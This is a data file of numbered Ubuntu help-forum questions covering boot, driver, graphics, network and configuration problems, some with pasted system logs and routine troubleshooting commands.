396693	garry 's mod not working,	i 'm a linux noob , so bear with me here . my computer is a dell vostro 200 running ubuntu 13.10 , graphics chipset is a g33/g31 . before , when it had windows 7 as the os , gmod ran fine . but when i made the switch to linux , a window pops up saying , '' could not find required opengl entry point 'glgeterror'| either your video card is unsupported , or your opengl driver needs to be updated . and it 's the same for any source game . how to fix this ?
396695	smartphone storage broken after 12.04 upgrade	i ca n't connect my jelly bean smartphone storage as usb since upgrade from 10.04 to 12.04. demsg gives following right after hit the `` turn on usb storage '' icon : write cache : enabled , read cache : enabled , does n't support dpo or fua i do n't want to use mtp
396696	backlight controls acer aspire v5-572g	i know there are already a lot of similar questions regarding issues with no back light control with acer models . i 'm not having that issue anymore i followed the necessary changes needed in /etc/grub . however my issue is more related to the brightness ranges that i can access using the function keys ( fn+←/→ ) . it seems that this range is different than with unity → system settings → brightness . in addition , the changed value using the function keys does not change the brightness values later . because of this i 'm noticing that when i 'm inactive for 10 minutes rather than dimming the screen it goes to full brightness ( since the setting is defaulted to full brightness in system settings → brightness ) . how to correct this ?
396698	lost my windows xp after bot-repair from the boot menu	i had ubuntu 12.04 alongside windows xp and was working fine . then i did following , 1 . reinstall windows xp and i lost grub 2 . booted using ubuntu live cd and installed boot-repair 3 . did boot-repair with 'recommended repair' now the notebook boots with grub , but windows xp option is missing . http : //paste.ubuntu.com/6649686/ thanks , aniket
396699	add gradeints to gimp 2.8 in ubuntu 12.04 lts	i have added it in windows 7 . can anyone tell me the path to gradients folder for gimp in ubuntu 12.04 lts . thanks .
396702	how to safely remove kde desktop environment from ubuntu 13.10	i installed kde-plasma-desktop from ubuntu software center , and then i uninstalled it through software center but when i rebooted my system there is no gui , i was able to use the command line tty by pressing ctl+ alt + f1 and thanks to timeshift i was able to restore my system back ( and kde is back ) so i am looking for a way to remove kde desktop without messing up my system ps : i use cinnamon and i also have openbox installed and i do n't want either of them to be effected
396706	can ubuntu be installed in my phone ?	i have htc explorer a310e android 3.2.5 mobile . i want to confirm and get reviews about installing ubuntu on my phone . if it can be installed , which version is possible to install . if possible , full guidance about installation . thank you
396707	ubuntu network problem	my ubuntu 12.04 is not detecting the lan connection ( vpn connection at university ) whereas my windows 7 is working fine . is it possible that network driver is not installed . there is no connection and and i can not download any driver or do anything else . please help me . update : lspci -nn|grep ethernet 00:19.0 ethernet controller [ 0200 ] : intel corporation device [ 8086:153b ] ( rev 04 ) also i figured out that there is no eth0 in the output of ifconfig -a. just lo and wlan0 exist . also i tried installation of e1000e intel driver but at last nothing happened .
396710	problem in booting ubuntu 13.10 os from dual hdd	i tried installing ubuntu 13.10 in two hard disks . i use both of the hdd 's on same computer.and the problem is first i installed ubuntu 13.04 and updated to 13.10 , and followed the same in the another hard disk . now the boot manager shows only the second hard disk os only . and i tried booting from boot menu option too by selecting my first hdd , and resulted in error `` no operting system found '' . by i have all my datas in it , all the dat . what would be the problem , and how to resolve it.. ? ? ?
396712	error : wrong architecture 'amd64 ' installing openstudio	i have installed ubuntu-13.10-desktop-i386 alongside the windows vista home edition 32 bit on my laptop , and now when i want to install openstudio on ubuntu i get this error : wrong architecture 'amd64' how can i fix this ?
396713	how to set a default volume setting for each audio/sound device ?	where the desired situation is this : when i change a sound output setting to a specific audio device , the volume is set to my default for this device , instead of a maximum volume . edit : actually i can do that , but the settings reset after system restarts .
396716	ca n't repair ubuntu boot though i have installed ubuntu again	i have formatted the partition which ubuntu 13.10 was there . then i could n't boot and i saw grub rescue . i have tried to install boot-repair but i ca n't . tried to install ubuntu 13.04 but it does n't boot and i still see grub rescue . and also i have tried to reinstall grub with terminal ( ubuntu live cd ) . what should i do ?
396718	installing ubuntu 12.04.3 - fails with bootloader	i have windows xp with 3 partitions ( 1 500gb disk ) - my xp boot partition ( drive c ) my personal partition where i do all my stuff a clone partition of my boot partition . i use # 3 for xxclone to clone c : for fallback in case of a virus attack . xxclone helped me to modify the boot.ini file in # 1 which then allows me to dual boot xp either from # 1 or # 3 - so far so good . since microsoft will withdraw support for xp from apr-14 , i have decided to use ubuntu . i have : downloaded all the software - created a boot cd & a boot usb stick created 3 partitions out of my # 2 above - 2.1 is just a smaller # 2 2.2 to install ubuntu 2.3 for ubuntu swap now i tried to install ubuntu after booting from my usb stick - into 2.2 and 2.3 . so far so good . while installing grub - the installer fails and asks me to manually install grub . when i reboot from my xp and use hiren 's software i can see 2.2 & 2.3 but - xp 's own disk manager ca n't see them . my question is : i got stuck here - i ca n't boot from my favourite & cuddly ubuntu . how do i go from here ? i want all my older stuff to remain there till it gets useless .
396719	how to download ubuntu softwares in windows ?	i 'm new user of ubuntu 12.04 at my home . i have no internet service at my home , but i want to download some ubuntu software packages from ubuntu apps directory at internet club ( there 's windows 7 os ) and put that software in my external hard drive , after it install them on my computer at home . i want to download some applications from ubuntu apps directory , but install button is inactive at mentioned site ! please tell me , how can i do ? with regards
396720	grub2 : is it possible to boot in window-8 by directly loading the bootmgr without having to chainload the `` volume boot code ''	i want to install grub on window partition . installing grub on the windows partition `` c : '' will be overwriting the windows `` volume boot code '' so window-8 will not be able to boot . `` chainloader +1 '' command wo n't work . is there any method that can be used to boot into the window in that case . from what i have read in this topic it might be possible , by using the `` ntldr /boomgr '' command . according to that answer '' ntldr /bootmgr '' will bypass pbr and load `` bootmgr '' directly . set root= ( hdx , y ) # where bootmgr is located . insmod ntfs # load ntfs module ntldr /bootmgr boot any of you have tried this before ?
396722	unusual activity was logged on my system when i was n't home	can someone please help with this log ? i was n't home when this happened . dec 27 07:48:13 mikky-e720 su [ 26915 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:48:13 mikky-e720 su [ 26915 ] : pam_unix ( su : session ) : session closed for user mikky dec 27 07:48:54 mikky-e720 unix_chkpwd [ 27214 ] : password check failed for user ( mikky ) dec 27 07:48:54 mikky-e720 gnome-screensaver-dialog : pam_unix ( gnome-screensaver : auth ) : authentication failure ; logname= uid=1000 euid=1000 tty=:0.0 ruser= rhost= user=mikky dec 27 07:48:54 mikky-e720 gnome-screensaver-dialog : pam_winbind ( gnome-screensaver : auth ) : getting password ( 0x00000388 ) dec 27 07:48:54 mikky-e720 gnome-screensaver-dialog : pam_winbind ( gnome-screensaver : auth ) : pam_get_item returned a password dec 27 07:48:54 mikky-e720 gnome-screensaver-dialog : pam_winbind ( gnome-screensaver : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user dec 27 07:49:23 mikky-e720 unix_chkpwd [ 27223 ] : password check failed for user ( mikky ) dec 27 07:49:23 mikky-e720 gnome-screensaver-dialog : pam_unix ( gnome-screensaver : auth ) : authentication failure ; logname= uid=1000 euid=1000 tty=:0.0 ruser= rhost= user=mikky dec 27 07:49:23 mikky-e720 gnome-screensaver-dialog : pam_winbind ( gnome-screensaver : auth ) : getting password ( 0x00000388 ) dec 27 07:49:23 mikky-e720 gnome-screensaver-dialog : pam_winbind ( gnome-screensaver : auth ) : pam_get_item returned a password dec 27 07:49:23 mikky-e720 gnome-screensaver-dialog : pam_winbind ( gnome-screensaver : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user dec 27 07:49:34 mikky-e720 gnome-screensaver-dialog : pam_unix ( gnome-screensaver : auth ) : conversation failed dec 27 07:49:34 mikky-e720 gnome-screensaver-dialog : pam_unix ( gnome-screensaver : auth ) : auth could not identify password for [ mikky ] dec 27 07:49:34 mikky-e720 gnome-screensaver-dialog : pam_winbind ( gnome-screensaver : auth ) : getting password ( 0x00000388 ) dec 27 07:49:35 mikky-e720 lightdm : pam_unix ( lightdm : session ) : session opened for user lightdm by ( uid=0 ) dec 27 07:49:35 mikky-e720 lightdm : pam_ck_connector ( lightdm : session ) : nox11 mode , ignoring pam_tty :1 dec 27 07:49:39 mikky-e720 lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` mikky '' dec 27 07:49:40 mikky-e720 dbus [ 1033 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.259 '' ( uid=104 pid=27307 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.19 '' ( uid=0 pid=1203 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) dec 27 07:49:41 mikky-e720 dbus [ 1033 ] : [ system ] rejected send message , 2 matched rules ; type= '' method_call '' , sender= '' :1.268 '' ( uid=104 pid=27359 comm= '' /usr/lib/indicator-datetime/indicator-datetime-ser '' ) interface= '' org.freedesktop.dbus.properties '' member= '' getall '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.19 '' ( uid=0 pid=1203 comm= '' /usr/sbin/console-kit-daemon -- no-daemon `` ) dec 27 07:52:43 mikky-e720 lightdm : pam_unix ( lightdm : auth ) : authentication failure ; logname= uid=0 euid=0 tty=:1 ruser= rhost= user=mikky dec 27 07:52:43 mikky-e720 lightdm : pam_winbind ( lightdm : auth ) : getting password ( 0x00000388 ) dec 27 07:52:43 mikky-e720 lightdm : pam_winbind ( lightdm : auth ) : pam_get_item returned a password dec 27 07:52:43 mikky-e720 lightdm : pam_winbind ( lightdm : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user dec 27 07:52:46 mikky-e720 lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` mikky '' dec 27 07:54:39 mikky-e720 lightdm : pam_unix ( lightdm : auth ) : authentication failure ; logname= uid=0 euid=0 tty=:1 ruser= rhost= user=mikky dec 27 07:54:39 mikky-e720 lightdm : pam_winbind ( lightdm : auth ) : getting password ( 0x00000388 ) dec 27 07:54:39 mikky-e720 lightdm : pam_winbind ( lightdm : auth ) : pam_get_item returned a password dec 27 07:54:39 mikky-e720 lightdm : pam_winbind ( lightdm : auth ) : request wbclogonuser failed : wbc_err_auth_error , pam error : pam_user_unknown ( 10 ) , ntstatus : nt_status_no_such_user , error message was : no such user dec 27 07:54:41 mikky-e720 lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` mikky '' dec 27 07:56:38 mikky-e720 su [ 27755 ] : successful su for mikky by root dec 27 07:56:38 mikky-e720 su [ 27755 ] : + ? ? ? root : mikky dec 27 07:56:38 mikky-e720 su [ 27755 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:56:38 mikky-e720 su [ 27755 ] : pam_unix ( su : session ) : session closed for user mikky dec 27 07:56:38 mikky-e720 su [ 27765 ] : successful su for mikky by root dec 27 07:56:38 mikky-e720 su [ 27765 ] : + ? ? ? root : mikky dec 27 07:56:38 mikky-e720 su [ 27765 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:56:38 mikky-e720 su [ 27765 ] : pam_unix ( su : session ) : session closed for user mikky dec 27 07:56:38 mikky-e720 su [ 27780 ] : successful su for mikky by root dec 27 07:56:38 mikky-e720 su [ 27780 ] : + ? ? ? root : mikky dec 27 07:56:38 mikky-e720 su [ 27780 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:56:38 mikky-e720 su [ 27780 ] : pam_unix ( su : session ) : session closed for user mikky dec 27 07:56:38 mikky-e720 su [ 27797 ] : successful su for lightdm by root dec 27 07:56:38 mikky-e720 su [ 27797 ] : + ? ? ? root : lightdm dec 27 07:56:38 mikky-e720 su [ 27797 ] : pam_unix ( su : session ) : session opened for user lightdm by ( uid=0 ) dec 27 07:56:38 mikky-e720 su [ 27797 ] : pam_unix ( su : session ) : session closed for user lightdm dec 27 07:56:38 mikky-e720 su [ 27811 ] : successful su for lightdm by root dec 27 07:56:38 mikky-e720 su [ 27811 ] : + ? ? ? root : lightdm dec 27 07:56:38 mikky-e720 su [ 27811 ] : pam_unix ( su : session ) : session opened for user lightdm by ( uid=0 ) dec 27 07:56:38 mikky-e720 su [ 27811 ] : pam_unix ( su : session ) : session closed for user lightdm dec 27 07:56:38 mikky-e720 su [ 27826 ] : successful su for lightdm by root dec 27 07:56:38 mikky-e720 su [ 27826 ] : + ? ? ? root : lightdm dec 27 07:56:38 mikky-e720 su [ 27826 ] : pam_unix ( su : session ) : session opened for user lightdm by ( uid=0 ) dec 27 07:56:39 mikky-e720 su [ 27826 ] : pam_unix ( su : session ) : session closed for user lightdm dec 27 07:56:39 mikky-e720 su [ 27854 ] : successful su for mikky by root dec 27 07:56:39 mikky-e720 su [ 27854 ] : + ? ? ? root : mikky dec 27 07:56:39 mikky-e720 su [ 27854 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:56:39 mikky-e720 su [ 27854 ] : pam_unix ( su : session ) : session closed for user mikky dec 27 07:56:39 mikky-e720 su [ 27864 ] : successful su for mikky by root dec 27 07:56:39 mikky-e720 su [ 27864 ] : + ? ? ? root : mikky dec 27 07:56:39 mikky-e720 su [ 27864 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:56:39 mikky-e720 su [ 27864 ] : pam_unix ( su : session ) : session closed for user mikky dec 27 07:56:39 mikky-e720 su [ 27879 ] : successful su for mikky by root dec 27 07:56:39 mikky-e720 su [ 27879 ] : + ? ? ? root : mikky dec 27 07:56:39 mikky-e720 su [ 27879 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:56:39 mikky-e720 su [ 27879 ] : pam_unix ( su : session ) : session closed for user mikky dec 27 07:56:39 mikky-e720 su [ 27892 ] : successful su for mikky by root dec 27 07:56:39 mikky-e720 su [ 27892 ] : + ? ? ? root : mikky dec 27 07:56:39 mikky-e720 su [ 27892 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:56:39 mikky-e720 su [ 27892 ] : pam_unix ( su : session ) : session closed for user mikky dec 27 07:56:39 mikky-e720 su [ 27907 ] : successful su for mikky by root dec 27 07:56:39 mikky-e720 su [ 27907 ] : + ? ? ? root : mikky dec 27 07:56:39 mikky-e720 su [ 27907 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:56:39 mikky-e720 su [ 27907 ] : pam_unix ( su : session ) : session closed for user mikky dec 27 07:56:39 mikky-e720 su [ 27920 ] : successful su for mikky by root dec 27 07:56:39 mikky-e720 su [ 27920 ] : + ? ? ? root : mikky dec 27 07:56:39 mikky-e720 su [ 27920 ] : pam_unix ( su : session ) : session opened for user mikky by ( uid=0 ) dec 27 07:56:39 mikky-e720 su [ 27920 ] : pam_unix ( su : session ) : session closed for user mikky
396723	ricoh aficio sp 1200s driver for ubuntu	i receive blank pages when i give a print command for this multifunction printer . when i confirmed with the engineer , they said they do n't have driver for ubuntu/linux operation system . although machine is working properly on windows base operating system with the help from the cd which i receive from ricoh .
396724	error in apache configuration	initially my php was running well and after that when i installed perl cgi modules in order to run my cgi programs , there was problem . from the local host , i am not able to compile my php files nor my cgi files , i have tried all sort of possible solutions available in the google and finally wriring here . i have tried to restart the apache2 and here is the syntax error i could find . syntax error on line 151 of /etc/apache2/apache2.conf : invalid command '/etc/phpmyadmin/apache.conf ' , perhaps misspelled or defined by a module not included in the server configuration action 'configtest ' failed . the apache error log may have more information . ... fail ! kindly give me a possible solution to run both my cgi and php scripts . ?
396725	why does gedit create *~ files ?	whenever any file is edited with gedit it creates a new hidden file with the same name and a `` ~ '' in the end . why does gedit create such a file ? how to prevent gedit from creating such files ?
396726	please help me install this usb wifi adapter	i 'm fairly computer savvy , but still super new to linux so bear with me . if somebody could please walk me through the commands step-by-step , i would be very grateful the adapter info : http : //wikidevi.com/wiki/tp-link_tl-wn725n_v2 ubuntu 13 thanks for your attention . - joe
396727	upgrade ubuntu option not availiable when installing from usb stick !	i want to upgrade my current o.s . ubuntu 13.04 to ubuntu 13.10 . for that purpose i created bootable usb stick using unetbootin . when the laptop boots , it boots from the usb . now after a few steps there comes options as how to install . here there is n't the option for upgrading ubuntu which is supposed to be there as clear from this installation manual of ubuntu . for your ease i 'm showing the options as mentioned in the manual below . please see the image below that shows what i get when my usb stick boots . it 's not having the option for upgrading . ( also its not having the option for erasing the current o.s . rather it has option for erasing the whole disk ! ! ! because of this i ca n't replace the current ubuntu 13.04 with 13.10. ) it may happen that the problem wo n't be resolved using usb stick . then tomorrow i will purchase dvd and burn the ubuntu 13.10 iso image there . dvd should work as earlier also when usb stick did n't work to install my ubuntu 12.10 then dvd worked perfectly . also i would like to add how i prepared my usb stick . using fdisk , i deleted the partition there . i created only 1 new partition to occupy whole 2gb of space of my usb stick or flash drive whatever you say . then using mkfs created file system of ext4 type . then using unetbootin created bootable ubuntu 13.10 from its iso . i have a related thread here .
396728	how to practice ssh with single ubuntu system ?	i am having only one ubuntu installed pc and i must practice ssh . could somebody help me how can i do that ? thank you .
396729	how to dynamically switch public ip of my vps ( with multiple ips )	i have vps with 7 ips , running ubuntu 12.04 . you can see output of my ifconfig command here at picture : if config output now i want to run php script under the different public ip each time . for example every 1 second i want to access remote server with my php script and have different public ip address assigned . so i need somehow to quickly and dynamically switch between my 7 ip addresses attached to my vps . i have to say that i will not use this for any attack or bad things . i need to use this script to register one particular domain name which is held by domain speculators for long time . and server providing domain registration has very strict access rules .
396730	how to create auto expanding , expandable , non-fixed dynamic resizing img image files	please tell me how to make a .img file that auto expands as data is copied into it . i know this is possible . i used to make them all the time to create debian and ubuntu loop files for android devices to chroot into . the loop img files would auto increase in size as they were filled . is this a qemu img thing ? help .
396733	asus x450c wireless driver ubuntu 10.04.1	can you help me to make my asus x450c enable its wlan on ubuntu 10.04.1 ? i am doing my thesis and needing to use this version of ubuntu . when i do lspci , the result of network line is : 02:00:0 network controller : ralink device 3290 and the result of ethernet is : 03:00:2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 0a ) thank you very much .
396734	ubuntu 13.10 installation problem	i have installed ubuntu 13.10 in my windows 7 pc , but iam not getting a dual boot option at start.the pc automatically boots into windows 7 os without prompting dual boot . please tell me what to do ? .
396735	bumblebee segfault in nvidia drivers	i recently tried to use my laptop ( an msi ge60 , with a geforce gt 750m ) under lubuntu 13.10 . from the info i gathered , i had to use bumblebee if i wanted to use the geforce . i installed it using instruction found here and here . i 've updated the drivers to nvidia-319-updates . but despite that , when i try to run primusrun glxgears , i have the following output : kernel : [ 138.620890 ] bbswitch : enabling discrete graphics kernel : [ 139.075668 ] pci 0000:01:00.0 : power state changed by acpi to d0 kernel : [ 139.085492 ] [ drm ] initialized nvidia-drm 0.0.0 20130102 for 0000:01:00.0 on minor 0 kernel : [ 139.085499 ] nvrm : loading nvidia unix x86_64 kernel module 319.60 wed sep 25 14:28:26 pdt 2013 acpid : client 1994 [ 0:1001 ] has disconnected acpid : client 1994 [ 0:1001 ] has disconnected acpid : client connected from 2024 [ 0:1001 ] acpid : 1 client rule loaded kernel : [ 139.130099 ] vgaarb : this pci device is not a vga device kernel : [ 139.134812 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) . . . kernel : [ 139.609964 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) kernel : [ 139.700688 ] vgaarb : this pci device is not a vga device acpid : client connected from 2024 [ 0:1001 ] acpid : 1 client rule loaded bumblebeed [ 1209 ] : [ xorg ] ( ww ) `` xmir '' is not to be loaded by default . skipping . bumblebeed [ 1209 ] : [ xorg ] ( ww ) unresolved symbol : fbgetgcprivatekey bumblebeed [ 1209 ] : [ xorg ] ( ww ) nvidia ( 0 ) : failed to enable display hotplug notification bumblebeed [ 1209 ] : [ xorg ] ( ww ) nvidia ( 0 ) : unable to get display device for dpi computation . bumblebeed [ 1209 ] : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initiate mode change . bumblebeed [ 1209 ] : [ xorg ] ( ee ) nvidia ( 0 ) : failed to complete mode change kernel : [ 140.107177 ] glxgears [ 2012 ] : segfault at 0 ip 00007fed358ca547 sp 00007fffd5883610 error 4 in libgl.so.1 [ 7fed358a5000+41000 ] kernel : [ 140.367801 ] [ drm ] module unloaded kernel : [ 140.369287 ] bbswitch : disabling discrete graphics kernel : [ 140.369298 ] acpi warning : \_sb_.pci0.peg0.pegp._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) kernel : [ 140.385057 ] pci 0000:01:00.0 : refused to change power state , currently in d0 bumblebeed [ 1209 ] : [ xorg ] ( ee ) server terminated successfully ( 0 ) . closing log file . bumblebeed [ 1209 ] : [ xorg ] ( ee ) bumblebeed [ 1209 ] : [ xorg ] ( ee ) backtrace : bumblebeed [ 1209 ] : [ xorg ] ( ee ) 0 : xorg ( xorg_backtrace+0x3d ) [ 0x7f4763c7902d ] bumblebeed [ 1209 ] : [ xorg ] ( ee ) 1 : xorg ( 0x7f4763ad7000+0x1a5d99 ) [ 0x7f4763c7cd99 ] bumblebeed [ 1209 ] : [ xorg ] ( ee ) 2 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7f4762bd7000+0xfbb0 ) [ 0x7f4762be6bb0 ] bumblebeed [ 1209 ] : [ xorg ] ( ee ) 3 : /lib/x86_64-linux-gnu/libc.so.6 ( malloc_usable_size+0x26 ) [ 0x7f4761875326 ] bumblebeed [ 1209 ] : [ xorg ] ( ee ) 4 : /usr/lib/nvidia-319-updates/libgl.so.1 ( 0x7f475e981000+0xb20c4 ) [ 0x7f475ea330c4 ] bumblebeed [ 1209 ] : [ xorg ] ( ee ) bumblebeed [ 1209 ] : [ xorg ] ( ee ) segmentation fault at address 0x0 bumblebeed [ 1209 ] : [ xorg ] ( ee ) bumblebeed [ 1209 ] : [ xorg ] ( ee ) caught signal 11 ( segmentation fault ) . server aborting bumblebeed [ 1209 ] : [ xorg ] ( ee ) bumblebeed [ 1209 ] : [ xorg ] ( ee ) bumblebeed [ 1209 ] : [ xorg ] ( ee ) please also check the log file at `` /var/log/xorg.8.log '' for additional information . bumblebeed [ 1209 ] : [ xorg ] ( ee ) i tried to look at /var/log/xorg.8.log , but did n't found any useful info there ( i tried to look for erros but had the following result : cat /var/log/xorg.8.log | grep ee ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 1664.687 ] initializing built-in extension mit-screen-saver [ 1664.721 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) [ 1665.313 ] ( ee ) nvidia ( 0 ) : failed to initiate mode change . [ 1665.313 ] ( ee ) nvidia ( 0 ) : failed to complete mode change [ 1665.678 ] ( ee ) failed to load module `` kbd '' ( module does not exist , 0 ) [ 1665.678 ] ( ee ) no input driver matching `kbd' [ 1665.892 ] ( ee ) server terminated successfully ( 0 ) . closing log file . i also tried to change the keepunusedxserver to true to see if i had other outputs , but the only one i had in syslog was the following : glxgears [ 2086 ] : segfault at 0 ip 00007f5ee5d41547 sp 00007fff71783f40 error 4 in libgl.so.1 [ 7f5ee5d1c000+41000 ] . also on note , when i run primusrun nvidia-settings i have a message telling me that i 'm not running the nvidia driver . but optirun nvidia-settings -c :8 does show the settings.tho , it still produces the same kind of log in syslog . just in case , the ( uncommented ) bumblebee.conf : [ bumblebeed ] virtualdisplay=:8 keepunusedxserver=false servergroup=bumblebee turncardoffatexit=false noecomodeoverride=false driver=nvidia xorgconfdir=/etc/bumblebee/xorg.conf.d [ optirun ] bridge=auto vgltransport=proxy primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus allowfallbacktoigc=false [ driver-nvidia ] kerneldriver=nvidia-319-updates pmmethod=auto librarypath=/usr/lib/nvidia-319-updates : /usr/lib32/nvidia-319-updates xorgmodulepath=/usr/lib/nvidia-319-updates/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau thanks in advance for the replies !
396736	hunting down weird network activity	i am in a hunt , i noticed in network monitor that there is constant network traffic over the ppp0 . ppp0 is my 3g dongle . above is what i see hours after hours with all foreground and background programs closed . i used netstat to find the nasty program - nothing . it shows no connection ! but network monitor keeps showing random activity both in and out constantly . average speed is 2 kbit/s - in , 2 kbit/s - out . overall it is not a big value ( 4000*60*60/8*24 = 43 mb ) , but my network provider seems to be rounding it up somehow , and i end up loosing around 250 megabyte of traffic during the day just to this weird network activity . which is equals to my daily limit set by mobile isp . ifconfig ppp0 executed periodically confirms - there are bytes flowing . netstat - nothing . ss - nothing . i used every possible flag to both . then i tried iftop nethogs and ntop , finally nethogs and ntop show me something . there is no process associates with the network activity , it seems to be originating from the kernel . both programs are showing much more than netstat does . i can see few connections are created every second , and while watching at host names , i realized that they all go to outer dns servers around the world . it was amazing watching it live , as my computer was connecting to other computers all over the world , i could see from the network translated addresses how names of countries and cities waterfall in my console at the amazing speed . though most of connections go to two ip adresses which i also found in resolv.conf . interesting that this activity started recently , few days ago , but last week when i was not browsing the web or downloading something , network monitor was showing a nice straight line at zero . please help me to understand what 's going on exactly , and how can i stop this ( quite pricey with my telcom plan ) network activity .
396738	black screen before login	i 'm having some trouble with my xubuntu . it was running just fine yesterday but it 's not working today . i remember that i 've flipped the power switch during the last shutdown ( because it was taking forever ) ; which might have caused the problem . system : running xubuntu 12.10 with ati radeon 7950 installed . problem description : grub is loading up properly , but my display turns black right before i can see the login screen . what i 've done so far : booted into recovery mode and uninstalled the display driver via : sudo sh /usr/share/ati/fglrx-uninstall.sh sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* sudo rm /etc/x11/xorg.conf sudo apt-get install -- reinstall xserver-xorg-core libgl1-mesa-glx libgl1-mesa-dri libgl1-mesa-glx libgl1-mesa-dri sudo dpkg-reconfigure xserver-xorg thank you for your help .
396739	black screen while installing on a hp pavillion 15	i 'm asking for help installing ubuntu 64bits on a hp pavillion 15 through usb . disabled fast-boot disabled secure boot prioritized usb boot so i boot into grub i select either run or install and i get a black screen . if i select try ubuntu i have the ubuntu loading screen then i get a black screen . i 've tried to enable legacy support and prioritize usb ( something about if legacy is enabled uefi is still prioritized ) and i still have no luck .
396742	how to open 'webkit inspector ' in gtk webkit ?	it is very easy in node webkit . how to do that in gtk webkit for debugging ?
396747	why conky and docky does n't start automatically at lubuntu	i installed lubuntu 13.10 and want to run installed conky and docky after booting whenever i lunch lubuntu . i installed next : sudo apt-get install xcompmgr once installed , i put the command to autostart xcompmgr whenever lubuntu starts : gksudo leafpad /etc/xdg/lxsession/lubuntu/autostart here is content of my autostart file : @ xcompmgr -n @ conky but this does n't start automatically . any suggestions ? how to solve this trouble
396750	failed to download package files . checck internet connection	i 'm using ubuntu 12.04. im trying to install something but got the error message . i am connected to internet . maybe the firewall ? but i dont know how to check it here in ubuntu please help
396751	attempting headless boot - grub keeps coming up and preventing startup	i 've installed ubuntu 13.10 on a mac mini i 'm trying to get the computer to boot without any attached peripherals or displays . for whatever reason , grub always comes up on every boot , and it displays two options : `` ubuntu '' and `` advanced options for ubuntu '' . how can i stop this menu from interrupting the boot ? i 've already tried `` grub_hidden_timeout_quiet=true '' , and it did n't seem to work .
396752	how can i get updates about a loco team ?	i wanted to join to ubuntu loco team in jordan but the team is inactive and it seems that in this status since 2008 , what is the solution ?
396754	sudo does not recognize my password anymore	the problem is happening on a remote server , so everything is done through ssh . i can login with my key , no problem here . i can change my password at will with passwd ( which i believe shows that it 's the correct password for my user ) . my user is in the sudoers file ( i could check with pkexec cat /etc/sudoers and entering the root password ) however , being logged in as my regular user , i ca n't run sudo commands anymore , it just says sorry , try again as if the password was mistyped . i have no clue what causes that , i 've tried changing my password , which i could , but it does n't solve the sudo problem . $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.10 release : 12.10 codename : quantal
396756	my dell inspiron 1464 bluetooth adapters does not work in ubuntu 12.04 lts	my dell inspiron 1464 bluetooth adapters does not work in ubuntu 12.04 lts how to fix this ? bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 008 : id 0a5c:4500 broadcom corp. bcm2046b1 usb 2.0 hub ( part of bcm2046 bluetooth ) bus 001 device 004 : id 0c45:6480 microdia sonix 1.3 mp laptop integrated webcam bus 002 device 003 : id 1c4f:0003 sigma micro hid controller bus 002 device 005 : id 198f:0220 beceem communications inc. bcsm250 wimax adapter bus 001 device 009 : id 413c:8161 dell computer corp . integrated keyboard bus 001 device 010 : id 413c:8162 dell computer corp . integrated touchpad [ synaptics ]
396758	i need file system help	there are four paper looking icons in the file system they all have a dark black arrows at the bottom . is it normal for them not to be in a folder ? if not how do i remove them ? here 's how they read : initrd.img initrd.img.old vmlinuz vmlinuz.old
396759	how do i install dupeguru music edition ?	i need to install dupeguru music edition but i do not know what files do i have to download for installing the software . the instructions spoke about quantal , saucy , raring , precise . what do these terms mean ? i am new to ubuntu and i do not find the easy way to understand it .
